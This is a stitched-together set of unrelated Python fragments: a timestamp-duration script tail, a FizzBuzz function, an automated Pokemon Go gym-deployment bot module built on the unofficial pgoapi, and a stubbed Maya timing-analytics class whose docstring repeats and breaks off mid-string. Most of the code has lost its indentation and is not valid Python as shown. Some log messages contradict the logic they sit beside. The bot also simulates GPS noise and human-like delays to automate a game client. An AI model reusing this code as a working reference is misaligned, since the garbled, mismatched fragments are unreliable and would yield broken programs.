        stop_datetime = datetime.strptime(last_line[:-1], '%a %b %d %H:%M:%S %Z %Y')
        duration += stop_datetime - start_datetime
print(f'Total duration: {duration.total_seconds()/3600:g} hours')
|
def checkio(number: int) -> str:
result = []
if (number % 3) == 0:
result.append("Fizz")
if (number % 5) == 0:
result.append("Buzz")
if not result:
result.append(str(number))
return " ".join(result)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from datetime import datetime, timedelta
import sys
import time
import random
from random import uniform
from collections import Counter
from pgoapi.utilities import f2i
from pokemongo_bot import inventory
from pokemongo_bot.inventory import player
from pokemongo_bot.constants import Constants
from pokemongo_bot.human_behaviour import action_delay, sleep
from pokemongo_bot.worker_result import WorkerResult
from pokemongo_bot.base_task import BaseTask
from .utils import distance, format_time, fort_details, format_dist
from pokemongo_bot.tree_config_builder import ConfigException
from pokemongo_bot.walkers.walker_factory import walker_factory
from pokemongo_bot.inventory import Pokemons
from sys import stdout
GYM_DETAIL_RESULT_SUCCESS = 1
GYM_DETAIL_RESULT_OUT_OF_RANGE = 2
GYM_DETAIL_RESULT_UNSET = 0
TEAM_NOT_SET = 0
TEAM_BLUE = 1
TEAM_RED = 2
TEAM_YELLOW = 3
TEAMS = {
0: "Not Set",
1: "Mystic",
2: "Valor",
3: "Instinct"
}
ITEM_RAZZBERRY = 701
ITEM_NANABBERRY = 703
ITEM_PINAPBERRY = 705
class GymPokemon(BaseTask):
SUPPORTED_TASK_API_VERSION = 1
def __init__(self, bot, config):
super(GymPokemon, self).__init__(bot, config)
def initialize(self):
# 10 seconds from current time
self.next_update = datetime.now() + timedelta(0, 10)
self.order_by = self.config.get('order_by', 'cp')
self.enabled = self.config.get('enabled', False)
self.min_interval = self.config.get('min_interval', 360)
self.min_recheck = self.config.get('min_recheck', 30)
self.max_recheck = self.config.get('max_recheck', 120)
self.take_at_most = self.config.get('take_at_most', 20)
if self.take_at_most > 20:
self.logger.warning("We can take more than 20 gyms!")
self.take_at_most = 20
self.leave_at_least_spots = self.config.get('leave_at_least_spots', 0)
if self.leave_at_least_spots > 4:
self.logger.warning("There are only 6 spots in a gym, when we drop a Pokemon in that would leave 5 spots! Setting leave open spots to 4!")
self.leave_at_least_spots = 4
self.chain_fill_gyms = self.config.get('chain_fill_gyms', True)
self.ignore_max_cp_pokemon = self.config.get('allow_above_cp', ["Blissey"])
self.never_place = self.config.get('never_place', [])
self.pick_random_pokemon = self.config.get('pick_random_pokemon', True)
self.can_be_disabled_by_catch_limter = self.config.get("can_be_disabled_by_catch_limter", False)
self.recheck = datetime.now()
self.walker = self.config.get('walker', 'StepWalker')
self.destination = None
self.recent_gyms = []
self.pokemons = []
self.fort_pokemons = []
self.expire_recent = 10
self.next_expire = None
self.dropped_gyms = []
        self.blacklist = []
self.check_interval = 0
self.gyms = []
self.raid_gyms = dict()
self.bot.event_manager.register_event('gym_error')
self.bot.event_manager.register_event('fed_pokemon')
self.bot.event_manager.register_event('gym_full')
self.bot.event_manager.register_event('deployed_pokemon')
#self.logger.info("player_date %s." % self.bot.player_data)
try:
self.team = self.bot.player_data['team']
except KeyError:
self.team = TEAM_NOT_SET
if self.enabled:
self.emit_event(
'gym_error',
formatted="You have no team selected, so the module GymPokemon should be disabled"
)
def should_run(self):
# Check if we have any Pokemons and are level > 5 and have selected a team
return player()._level >= 5 and len(self.pokemons) > 0 and self.team > TEAM_NOT_SET
def display_fort_pokemon(self):
if len(self.fort_pokemons) == 0:
return
self.logger.info("We currently have %s Pokemon in Gym(s):" % len(self.fort_pokemons) )
for pokemon in self.fort_pokemons:
            self.logger.info("%s (%s CP)" % (pokemon.name, pokemon.cp))
def work(self):
if not self.enabled:
return WorkerResult.SUCCESS
if self.bot.catch_disabled and self.can_be_disabled_by_catch_limter:
# When catching is disabled, drop the target.
if self.destination is not None:
self.destination = None
if not hasattr(self.bot, "gym_pokemon_disabled_global_warning") or \
(hasattr(self.bot, "gym_pokemon_disabled_global_warning") and not self.bot.gym_pokemon_disabled_global_warning):
self.logger.info("All gym tasks are currently disabled until {}. Gym function will resume when catching tasks are re-enabled".format(self.bot.catch_resume_at.strftime("%H:%M:%S")))
self.bot.gym_pokemon_disabled_global_warning = True
return WorkerResult.SUCCESS
else:
self.bot.gym_pokemon_disabled_global_warning = False
self.pokemons = inventory.pokemons().all()
self.fort_pokemons = [p for p in self.pokemons if p.in_fort]
self.pokemons = [p for p in self.pokemons if not p.in_fort]
self.dropped_gyms = []
for pokemon in self.fort_pokemons:
self.dropped_gyms.append(pokemon.fort_id)
if self._should_print():
self.display_fort_pokemon()
self._compute_next_update()
        # TODO: also display stats about Pokemon in gyms and collection times
if not self.enabled:
return WorkerResult.SUCCESS
if self.bot.softban:
return WorkerResult.SUCCESS
if len(self.fort_pokemons) >= self.take_at_most:
if self._should_print():
self.logger.info("We have a max of %s Pokemon in gyms." % self.take_at_most)
return WorkerResult.SUCCESS
if not self.should_run():
return WorkerResult.SUCCESS
if self.destination is None:
self.check_close_gym()
if self.destination is None:
            self.determine_new_destination()
if self.destination is not None:
result = self.move_to_destination()
# Can return RUNNING to move to a gym
return result
if hasattr(self.bot, "hunter_locked_target") and self.bot.hunter_locked_target is not None:
# Don't move to a gym when hunting for a Pokemon
return WorkerResult.SUCCESS
return WorkerResult.SUCCESS
def check_close_gym(self):
# Check if we are walking past a gym
close_gyms = self.get_gyms_in_range()
# Filter active raids from the gyms
close_gyms = filter(lambda gym: gym["id"] not in self.raid_gyms, close_gyms)
if len(close_gyms) > 0:
# self.logger.info("Walking past a gym!")
for gym in close_gyms:
if gym["id"] in self.dropped_gyms:
continue
gym_details = self.get_gym_details(gym)
if gym_details:
pokes = self._get_pokemons_in_gym(gym_details)
if len(pokes) == 6:
continue
if 'enabled' in gym:
if not gym['enabled']:
continue
if 'owned_by_team' in gym:
if gym["owned_by_team"] == self.team:
if 'gym_display' in gym:
display = gym['gym_display']
if 'slots_available' in display:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
if display['slots_available'] > 0 and gym["id"] not in self.dropped_gyms:
self.logger.info("Dropping pokemon in %s" % gym_details["name"])
self.drop_pokemon_in_gym(gym, pokes)
if self.destination is not None and gym["id"] == self.destination["id"]:
self.destination = None
return WorkerResult.SUCCESS
else:
self.logger.info("Neutral gym? %s" % gym)
self.logger.info("Dropping pokemon in %s" % gym_details["name"])
self.drop_pokemon_in_gym(gym, [])
if self.destination is not None and gym["id"] == self.destination["id"]:
self.destination = None
return WorkerResult.SUCCESS
    def determine_new_destination(self):
gyms = self.get_gyms()
if len(gyms) == 0:
if len(self.recent_gyms) == 0 and self._should_print():
self.logger.info("No Gyms in range to scan!")
return WorkerResult.SUCCESS
self.logger.info("Inspecting %s gyms." % len(gyms))
self.logger.info("Recent gyms: %s" % len(self.recent_gyms))
self.logger.info("Active raid gyms: %s" % len(self.raid_gyms))
teams = []
for gym in gyms:
# Ignore after done for 5 mins
self.recent_gyms.append(gym["id"])
if 'enabled' in gym:
                # Gym can be closed for a raid or something, skip to the next
if not gym['enabled']:
continue
if 'owned_by_team' in gym:
if gym["owned_by_team"] == 1:
teams.append("Mystic")
elif gym["owned_by_team"] == 2:
teams.append("Valor")
elif gym["owned_by_team"] == 3:
teams.append("Instinct")
# else:
# self.logger.info("Unknown team? %s" % gym)
if gym["owned_by_team"] == self.team:
if 'gym_display' in gym:
display = gym['gym_display']
if 'slots_available' in display:
if self.leave_at_least_spots > 0:
if display['slots_available'] > self.leave_at_least_spots:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
self.destination = gym
break
else:
self.logger.info("Gym has %s open spots, but we don't drop Pokemon in it because that would leave less than %s open spots" % (display['slots_available'], self.leave_at_least_spots))
else:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
self.destination = gym
break
else:
# self.logger.info("Found a Neutral gym?")
# self.logger.info("Info: %s" % gym)
self.destination = gym
break
if len(teams) > 0:
count_teams = Counter(teams)
self.logger.info("Gym Teams %s", ", ".join('{}({})'.format(key, val) for key, val in count_teams.items()))
def move_to_destination(self):
if self.check_interval >= 4:
self.check_interval = 0
gyms = self.get_gyms()
for g in gyms:
if g["id"] == self.destination["id"]:
# self.logger.info("Inspecting target: %s" % g)
if "owned_by_team" in g and g["owned_by_team"] is not self.team:
self.logger.info("Damn! Team %s took gym before we arrived!" % TEAMS[g["owned_by_team"]])
self.destination = None
return WorkerResult.SUCCESS
break
else:
self.check_interval += 1
# Moving to a gym to deploy Pokemon
unit = self.bot.config.distance_unit # Unit to use when printing formatted distance
lat = self.destination["latitude"]
lng = self.destination["longitude"]
details = fort_details(self.bot, self.destination["id"], lat, lng)
gym_name = details.get('name', 'Unknown')
dist = distance(
self.bot.position[0],
self.bot.position[1],
lat,
lng
)
noised_dist = distance(
self.bot.noised_position[0],
self.bot.noised_position[1],
lat,
lng
)
moving = noised_dist > Constants.MAX_DISTANCE_FORT_IS_REACHABLE if self.bot.config.replicate_gps_xy_noise else dist > Constants.MAX_DISTANCE_FORT_IS_REACHABLE
if moving:
fort_event_data = {
'fort_name': u"{}".format(gym_name),
'distance': format_dist(dist, unit),
}
self.emit_event(
'moving_to_fort',
formatted="Moving towards open Gym {fort_name} - {distance}",
data=fort_event_data
)
step_walker = walker_factory(self.walker, self.bot, lat, lng)
if not step_walker.step():
return WorkerResult.RUNNING
else:
#Running fails. Let's stop moving to the gym
return WorkerResult.SUCCESS
else:
self.emit_event(
'arrived_at_fort',
formatted=("Arrived at Gym %s." % gym_name)
)
gym_details = self.get_gym_details(self.destination)
current_pokemons = self._get_pokemons_in_gym(gym_details)
self.drop_pokemon_in_gym(self.destination, current_pokemons)
self.destination = None
if len(self.fort_pokemons) >= self.take_at_most:
self.logger.info("We have a max of %s Pokemon in gyms." % self.take_at_most)
return WorkerResult.SUCCESS
elif self.chain_fill_gyms:
# Look around if there are more gyms to fill
                self.determine_new_destination()
# If there is none, we're done, else we go to the next!
if self.destination is None:
return WorkerResult.SUCCESS
else:
return WorkerResult.RUNNING
else:
return WorkerResult.SUCCESS
def get_gym_details(self, gym):
lat = gym['latitude']
lng = gym['longitude']
in_reach = False
if self.bot.config.replicate_gps_xy_noise:
if distance(self.bot.noised_position[0], self.bot.noised_position[1], gym['latitude'], gym['longitude']) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE:
in_reach = True
else:
if distance(self.bot.position[0], self.bot.position[1], gym['latitude'], gym['longitude']) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE:
in_reach = True
if in_reach:
request = self.bot.api.create_request()
request.gym_get_info(gym_id=gym['id'], gym_lat_degrees=lat, gym_lng_degrees=lng, player_lat_degrees=self.bot.position[0],player_lng_degrees=self.bot.position[1])
response_dict = request.call()
if ('responses' in response_dict) and ('GYM_GET_INFO' in response_dict['responses']):
details = response_dict['responses']['GYM_GET_INFO']
return details
else:
return False
# details = fort_details(self.bot, , lat, lng)
# fort_name = details.get('name', 'Unknown')
# self.logger.info("Checking Gym: %s (%s pts)" % (fort_name, gym['gym_points']))
def _get_pokemons_in_gym(self, gym_details):
pokemon_names = []
gym_info = gym_details.get('gym_status_and_defenders', None)
if gym_info:
defenders = gym_info.get('gym_defender', [])
for defender in defenders:
motivated_pokemon = defender.get('motivated_pokemon')
pokemon_info = motivated_pokemon.get('pokemon')
pokemon_id = pokemon_info.get('pokemon_id')
pokemon_names.append(Pokemons.name_for(pokemon_id))
return pokemon_names
def drop_pokemon_in_gym(self, gym, current_pokemons):
self.pokemons = inventory.pokemons().all()
self.fort_pokemons = [p for p in self.pokemons if p.in_fort]
self.pokemons = [p for p in self.pokemons if not p.in_fort]
close_gyms = self.get_gyms_in_range()
empty_gym = False
for pokemon in self.fort_pokemons:
if pokemon.fort_id == gym["id"]:
self.logger.info("We are already in this gym!")
if pokemon.fort_id not in self.dropped_gyms:
self.dropped_gyms.append(pokemon.fort_id)
self.recent_gyms.append(gym["id"])
return WorkerResult.SUCCESS
for g in close_gyms:
if g["id"] == gym["id"]:
if 'owned_by_team' in g:
self.logger.info("Expecting team: %s it is: %s" % (self.bot.player_data['team'], g["owned_by_team"]) )
if g["owned_by_team"] is not self.team:
self.logger.info("Can't drop in a enemy gym!")
self.recent_gyms.append(gym["id"])
return WorkerResult.SUCCESS
else:
#self.logger.info("Empty gym?? %s" % g)
gym_details = self.get_gym_details(gym)
#self.logger.info("Details: %s" % gym_details)
empty_gym = True
if not gym_details or gym_details == {}:
self.logger.info("No details for this Gym? Blacklisting!")
self.blacklist.append(gym["id"])
return WorkerResult.SUCCESS
# Check for raid
if 'raid_info' in gym:
raid_info = gym["raid_info"]
raid_starts = datetime.fromtimestamp(int(raid_info["raid_battle_ms"]) / 1e3)
raid_ends = datetime.fromtimestamp(int(raid_info["raid_end_ms"]) / 1e3)
self.logger.info("Raid starts: %s" % raid_starts.strftime('%Y-%m-%d %H:%M:%S.%f'))
self.logger.info("Raid ends: %s" % raid_ends.strftime('%Y-%m-%d %H:%M:%S.%f'))
t = datetime.today()
if raid_starts < datetime.now():
self.logger.info("Active raid?")
if raid_ends < datetime.now():
self.logger.info("No need to wait.")
elif (raid_ends-t).seconds > 600:
self.logger.info("Need to wait long than 10 minutes, skipping")
self.destination = None
self.recent_gyms.append(gym["id"])
self.raid_gyms[gym["id"]] = raid_ends
return WorkerResult.SUCCESS
else:
first_time = False
while raid_ends > datetime.now():
raid_ending = (raid_ends-datetime.today()).seconds
sleep_m, sleep_s = divmod(raid_ending, 60)
sleep_h, sleep_m = divmod(sleep_m, 60)
sleep_hms = '%02d:%02d:%02d' % (sleep_h, sleep_m, sleep_s)
if not first_time:
# Clear the last log line!
stdout.write("\033[1A\033[0K\r")
stdout.flush()
first_time = True
self.logger.info("Waiting for %s for raid to end..." % sleep_hms)
if raid_ending > 20:
sleep(20)
else:
sleep(raid_ending)
break
else:
self.logger.info("Raid has not begun yet!")
if 'same_team_deploy_lockout_end_ms' in gym:
# self.logger.info("%f" % gym["same_team_deploy_lockout_end_ms"])
org_time = int(gym["same_team_deploy_lockout_end_ms"]) / 1e3
lockout_time = datetime.fromtimestamp(org_time)
t = datetime.today()
if lockout_time > datetime.now():
self.logger.info("Lockout time: %s" % lockout_time.strftime('%Y-%m-%d %H:%M:%S.%f'))
first_time = False
while lockout_time > datetime.now():
lockout_ending = (lockout_time-datetime.today()).seconds
sleep_m, sleep_s = divmod(lockout_ending, 60)
sleep_h, sleep_m = divmod(sleep_m, 60)
sleep_hms = '%02d:%02d:%02d' % (sleep_h, sleep_m, sleep_s)
                    if not first_time:
                        # Clear the previous countdown line so it is overwritten
                        stdout.write("\033[1A\033[0K\r")
                        stdout.flush()
                    first_time = False
self.logger.info("Waiting for %s deployment lockout to end..." % sleep_hms)
                    if lockout_ending > 40:
                        sleep(40)
                    else:
                        sleep(lockout_ending)
                        break
#FortDeployPokemon
# self.logger.info("Trying to deploy Pokemon in gym: %s" % gym)
gym_details = self.get_gym_details(gym)
# self.logger.info("Gym details: %s" % gym_details)
fort_pokemon = self._get_best_pokemon(current_pokemons)
pokemon_id = fort_pokemon.unique_id
# self.logger.info("Trying to deploy %s (%s)" % (fort_pokemon, pokemon_id))
# self.logger.info("Gym in control by %s. I am on team %s" % (gym["owned_by_team"], self.bot.player_data['team']))
request = self.bot.api.create_request()
request.gym_deploy(
fort_id=gym["id"],
pokemon_id=pokemon_id,
player_lat_degrees=f2i(self.bot.position[0]),
player_lng_degrees=f2i(self.bot.position[1])
)
# self.logger.info("Req: %s" % request)
response_dict = request.call()
# self.logger.info("Called deploy pokemon: %s" % response_dict)
if ('responses' in response_dict) and ('GYM_DEPLOY' in response_dict['responses']):
deploy = response_dict['responses']['GYM_DEPLOY']
            result = deploy.get('result', -1)
self.recent_gyms.append(gym["id"])
# self.logger.info("Status: %s" % result)
if result == 1:
self.dropped_gyms.append(gym["id"])
self.fort_pokemons.append(fort_pokemon)
gym_details = self.get_gym_details(gym)
                # SUCCESS
#self.logger.info("We deployed %s (%s CP) in the gym! We now have %s Pokemon in gyms!" % (fort_pokemon.name, fort_pokemon.cp, len(self.dropped_gyms)))
self.emit_event(
'deployed_pokemon',
formatted=("We deployed %s (%s CP) in the gym %s!!" % (fort_pokemon.name, fort_pokemon.cp, gym_details["name"])),
data={'gym_id': gym['id'], 'pokemon_id': pokemon_id}
)
return WorkerResult.SUCCESS
elif result == 2:
#ERROR_ALREADY_HAS_POKEMON_ON_FORT
self.logger.info('ERROR_ALREADY_HAS_POKEMON_ON_FORT')
self.dropped_gyms.append(gym["id"])
return WorkerResult.ERROR
elif result == 3:
#ERROR_OPPOSING_TEAM_OWNS_FORT
self.logger.info('ERROR_OPPOSING_TEAM_OWNS_FORT')
return WorkerResult.ERROR
elif result == 4:
#ERROR_FORT_IS_FULL
self.logger.info('ERROR_FORT_IS_FULL')
return WorkerResult.ERROR
elif result == 5:
#ERROR_NOT_IN_RANGE
self.logger.info('ERROR_NOT_IN_RANGE')
return WorkerResult.ERROR
elif result == 6:
#ERROR_PLAYER_HAS_NO_TEAM
self.logger.info('ERROR_PLAYER_HAS_NO_TEAM')
return WorkerResult.ERROR
elif result == 7:
#ERROR_POKEMON_NOT_FULL_HP
self.logger.info('ERROR_POKEMON_NOT_FULL_HP')
return WorkerResult.ERROR
elif result == 8:
#ERROR_PLAYER_BELOW_MINIMUM_LEVEL
self.logger.info('ERROR_PLAYER_BELOW_MINIMUM_LEVEL')
return WorkerResult.ERROR
            elif result == 9:
#ERROR_POKEMON_IS_BUDDY
self.logger.info('ERROR_POKEMON_IS_BUDDY')
return WorkerResult.ERROR
def get_gyms(self, skip_recent_filter=False):
if len(self.gyms) == 0:
self.gyms = self.bot.get_gyms(order_by_distance=True)
if self._should_recheck():
self.gyms = self.bot.get_gyms(order_by_distance=True)
self._compute_next_recheck()
if self._should_expire():
self.recent_gyms = []
self._compute_next_expire()
# Check raid gyms for raids that ended
for gym_id in list(self.raid_gyms.keys()):
if self.raid_gyms[gym_id] < datetime.now():
self.logger.info("Raid at %s ended (%s)" % (gym_id, self.raid_gyms[gym_id]))
del(self.raid_gyms[gym_id])
        # Honor skip_recent_filter so callers can bypass the recent-gym filter
        if skip_recent_filter:
            gyms = list(self.gyms)
        else:
            gyms = [gym for gym in self.gyms if gym["id"] not in self.recent_gyms]
        # Filter blacklisted gyms
        gyms = [gym for gym in gyms if gym["id"] not in self.blacklist]
        # Filter out gyms we are already in
        gyms = [gym for gym in gyms if gym["id"] not in self.dropped_gyms]
        # Filter ongoing raids
        gyms = [gym for gym in gyms if gym["id"] not in self.raid_gyms]
        # filter fake gyms
        # gyms = [gym for gym in gyms if "type" not in gym or gym["type"] != 1]
# sort by current distance
gyms.sort(key=lambda x: distance(
self.bot.position[0],
self.bot.position[1],
x['latitude'],
x['longitude']
))
return gyms
def get_gyms_in_range(self):
        gyms = self.get_gyms()
        if self.bot.config.replicate_gps_xy_noise:
            position = self.bot.noised_position
        else:
            position = self.bot.position
        return [fort for fort in gyms if distance(
            position[0],
            position[1],
            fort['latitude'],
            fort['longitude']
        ) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE]
def _should_print(self):
return self.next_update is None or datetime.now() >= self.next_update
def _should_expire(self):
return self.next_expire is None or datetime.now() >= self.next_expire
def _compute_next_expire(self):
self.next_expire = datetime.now() + timedelta(seconds=300)
def _compute_next_recheck(self):
wait = uniform(self.min_recheck, self.max_recheck)
self.recheck = datetime.now() + timedelta(seconds=wait)
def _should_recheck(self):
return self.recheck is None or datetime.now() >= self.recheck
def _compute_next_update(self):
"""
Computes the next update datetime based on the minimum update interval.
:return: Nothing.
:rtype: None
"""
self.next_update = datetime.now() + timedelta(seconds=self.min_interval)
def _get_best_pokemon(self, current_pokemons):
def get_poke_info(info, pokemon):
poke_info = {
'cp': pokemon.cp,
'iv': pokemon.iv,
'ivcp': pokemon.ivcp,
'ncp': pokemon.cp_percent,
'level': pokemon.level,
'hp': pokemon.hp,
'dps': pokemon.moveset.dps
}
if info not in poke_info:
raise ConfigException("order by {}' isn't available".format(self.order_by))
return poke_info[info]
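        # Note: per get_poke_info above, valid self.order_by values are
        # 'cp', 'iv', 'ivcp', 'ncp', 'level', 'hp' and 'dps'; anything else
        # raises ConfigException.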
legendaries = ["Lugia", "Zapdos", "HoOh", "Celebi", "Articuno", "Moltres", "Mewtwo", "Mew"]
# Don't place a Pokemon which is already in the gym (prevent ALL Blissey etc)
        possible_pokemons = [p for p in self.pokemons if p.name not in current_pokemons]
# Don't put in Pokemon above 3000 cp (morale drops too fast)
possible_pokemons = [p for p in possible_pokemons if p.cp < 3000 and p.name not in self.ignore_max_cp_pokemon]
# Filter out "bad" Pokemon
possible_pokemons = [p for p in possible_pokemons if not p.is_bad]
        # Ignore legendaries for gyms
        possible_pokemons = [p for p in possible_pokemons if p.name not in legendaries]
# Filter out "never place" Pokemon
possible_pokemons = [p for p in possible_pokemons if p.name not in self.never_place]
# HP Must be max
possible_pokemons = [p for p in possible_pokemons if p.hp == p.hp_max]
possible_pokemons = [p for p in possible_pokemons if not p.in_fort]
# Sort them
pokemons_ordered = sorted(possible_pokemons, key=lambda x: get_poke_info(self.order_by, x), reverse=True)
# Top 20 picks
pokemons_ordered = pokemons_ordered[0:20]
if self.pick_random_pokemon:
# Pick a random one!
random.shuffle(pokemons_ordered)
return pokemons_ordered[0]
|
"""
Gather basic scene timing information from the profiler,
with and without the invisibility evaluator active.
"""
from maya.analytics.decorators import makeAnalytic
from maya.debug.emModeManager import emModeManager
from maya.analytics.decorators import addHelp
from maya.analytics.BaseAnalytic import BaseAnalytic
from maya.analytics.decorators import addMethodDocs
class analyticTiming(BaseAnalytic):
"""
Examine timing information for basic operations in different modes.
The list of modes can be modified as needs change by altering the
MODE_LIST value in the script.
WARNING: Since this test gets timing for file-new you will lose your
data if you run it on the current scene.
It measures the following events for each of the modes, in microseconds. If
multiple instances of the event are found then the last one found is used,
under the assumption that the state is most steady by then.
EvaluationGraphConstruction : Graph build time
EvaluationGraphPartitioning : Graph partitioning time
EvaluationGraphExecution : Graph execution time
Vp2SceneRender : Viewport 2 rendering time
Vp1SceneRender : Legacy Viewport rendering time
ClusterCount : Total number of custom evaluator clusters
ClusterNodeCount : Total number of nodes in custom evaluator clusters
InvisibilityClusterCount : Total number of invisibility clusters
InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters
InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters
InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes
InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes
InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions
Note: InvisibilityCreateClusters is the parent of these three steps so don't add them:
- InvisibilityDiscover
- InvisibilityMarkNodes
- InvisibilityCreatePartitioning
and these, which are independent of the evaluator configuration:
FileNew : Time to empty the scene of the current file, in seconds
CycleCount : Total number of cycle clusters
CycleNodeCount : Total number of nodes in cycle clusters
Example output running in parallel mode both with and without the
invisibility for a scene that uses VP2:
"output" : {
"emp-invisibility" : {
"EvaluationGraphConstruction" : 5632,
"EvaluationGraphPartitioning" : 392,
"EvaluationGraphExecution" : 2020211,
"Vp2SceneRender" : 7152,
"Vp1SceneRender" : 0,
"ClusterCount" : 72,
"ClusterNodeCount" : 1230,
"InvisibilityClusterCount" : 0,
"InvisibilityClusterNodeCount" : 0,
"InvisibilityDiscover" : 0,
"InvisibilityCreateClusters" : 0,
"InvisibilityMarkNodes" : 0,
"InvisibilityCreatePartitioning" : 0
},
"emp+invisibility" : {
"EvaluationGraphConstruction" : 7801,
"EvaluationGraphPartitioning" : 738,
"EvaluationGraphExecution" : 19374,
"Vp2SceneRender" : 7326,
"Vp1SceneRender" : 0,
"ClusterCount" : 129,
"ClusterNodeCount" : 7183,
"InvisibilityClusterCount" : 11,
"InvisibilityClusterNodeCount" : 11,
"InvisibilityDiscover" : 12341,
"InvisibilityCreateClusters" : 123,
"InvisibilityMarkNodes" : 1110,
"InvisibilityCreatePartitioning" : 84
},
"CycleCount" : 3,
"CycleNodeCount" : 14,
"FileNew" : 4.19238
}
"""
def run(self):
"""
Run the analytic on the current scene.
:return: JSON results as described in the class doc
"""
pass
def help():
"""
Call this method to print the class documentation, including all methods.
"""
pass
ANALYTIC_DESCRIPTION_DETAILED = 'Examine timing information for basic operations in different modes.\nThe list of modes can be modified as needs change by altering the\nMODE_LIST value in the script.\n\nWARNING: Since this test gets timing for file-new you will lose your\n data if you run it on the current scene.\n\nIt measures the following events for each of the modes, in microseconds. If\nmultiple instances of the event are found then the last one found is used,\nunder the assumption that the state is most steady by then.\n\n EvaluationGraphConstruction : Graph build time\n EvaluationGraphPartitioning : Graph partitioning time\n EvaluationGraphExecution : Graph execution time\n Vp2SceneRender : Viewport 2 rendering time\n Vp1SceneRender : Legacy Viewport rendering time\n ClusterCount : Total number of custom evaluator clusters\n ClusterNodeCount : Total number of nodes in custom evaluator clusters\n InvisibilityClusterCount : Total number of invisibility clusters\n InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters\n InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters\n InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes\n InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes\n InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions\n\nNote: InvisibilityCreateClusters is the parent of these three steps so don\'t add them:\n - InvisibilityDiscover\n - InvisibilityMarkNodes\n - InvisibilityCreatePartitioning\n\nand these, which are independent of the evaluator configuration:\n FileNew : Time to empty the scene of the current file, in seconds\n CycleCount : Total number of cycle clusters\n CycleNodeCount : Total number of nodes in cycle clusters\n\nExample output running in parallel mode both with and without the\ninvisibility for a scene that uses VP2:\n\n "output" : {\n "emp-invisibility" : {\n "EvaluationGraphConstruction" : 5632,\n "EvaluationGraphPartitioning" : 392,\n "EvaluationGraphExecution" : 2020211,\n "Vp2SceneRender" : 7152,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 72,\n "ClusterNodeCount" : 1230,\n "InvisibilityClusterCount" : 0,\n "InvisibilityClusterNodeCount" : 0,\n "InvisibilityDiscover" : 0,\n "InvisibilityCreateClusters" : 0,\n "InvisibilityMarkNodes" : 0,\n "InvisibilityCreatePartitioning" : 0\n },\n "emp+invisibility" : {\n "EvaluationGraphConstruction" : 7801,\n "EvaluationGraphPartitioning" : 738,\n "EvaluationGraphExecution" : 19374,\n "Vp2SceneRender" : 7326,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 129,\n "ClusterNodeCount" : 7183,\n "InvisibilityClusterCount" : 11,\n "InvisibilityClusterNodeCount" : 11,\n "InvisibilityDiscover" : 12341,\n "InvisibilityCreateClusters" : 123,\n "InvisibilityMarkNodes" : 1110,\n "InvisibilityCreatePartitioning" : 84\n },\n "CycleCount" : 3,\n "CycleNodeCount" : 14,\n "FileNew" : 4.19238\n }'
ANALYTIC_DESCRIPTION_SHORT = []
ANALYTIC_LABEL = []
ANALYTIC_NAME = 'Timing'
    __fulldocs__ = 'Examine timing information for basic operations in different modes.\nThe list of modes can be modified as needs change by altering the\nMODE_LIST value in the script.\n\nWARNING: Since this test gets timing for file-new you will lose your\n data if you run it on the current scene.\n\nIt measures the following events for each of the modes, in microseconds. If\nmultiple instances of the event are found then the last one found is used,\nunder the assumption that the state is most steady by then.\n\n EvaluationGraphConstruction : Graph build time\n EvaluationGraphPartitioning : Graph partitioning time\n EvaluationGraphExecution : Graph execution time\n Vp2SceneRender : Viewport 2 rendering time\n Vp1SceneRender : Legacy Viewport rendering time\n ClusterCount : Total number of custom evaluator clusters\n ClusterNodeCount : Total number of nodes in custom evaluator clusters\n InvisibilityClusterCount : Total number of invisibility clusters\n InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters\n InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters\n InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes\n InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes\n InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions\n\nNote: InvisibilityCreateClusters is the parent of these three steps so don\'t add them:\n - InvisibilityDiscover\n - InvisibilityMarkNodes\n - InvisibilityCreatePartitioning\n\nand these, which are independent of the evaluator configuration:\n FileNew : Time to empty the scene of the current file, in seconds\n CycleCount : Total number of cycle clusters\n CycleNodeCount : Total number of nodes in cycle clusters\n\nExample output running in parallel mode both with and without the\ninvisibility for a scene that uses VP2:\n\n "output" : {\n "emp-invisibility" : {\n "EvaluationGraphConstruction" : 5632,\n "EvaluationGraphPartitioning" : 392,\n "EvaluationGraphExecution" : 2020211,\n "Vp2SceneRender" : 7152,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 72,\n "ClusterNodeCount" : 1230,\n "InvisibilityClusterCount" : 0,\n "InvisibilityClusterNodeCount" : 0,\n "InvisibilityDiscover" : 0,\n "InvisibilityCreateClusters" : 0,\n "InvisibilityMarkNodes" : 0,\n "InvisibilityCreatePartitioning" : 0\n },\n "emp+invisibility" : {\n "EvaluationGraphConstruction" : 7801,\n "EvaluationGraphPartitioning" : 738,\n "EvaluationGraphExecution" : 19374,\n "Vp2SceneRender" : 7326,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 129,\n "ClusterNodeCount" : 7183,\n "InvisibilityClusterCount" : 11,\n "InvisibilityClusterNodeCount" : 11,\n "InvisibilityDiscover" : 12341,\n "InvisibilityCreateClusters" : 123,\n "InvisibilityMarkNodes" : 1110,\n "InvisibilityCreatePartitioning" : 84\n },\n "CycleCount" : 3,\n "CycleNodeCount" : 14,\n "FileNew" : 4.19238\n }\nBase class for output for analytics.\n\nThe default location for the analytic output is in a subdirectory\ncalled \'MayaAnalytics\' in your 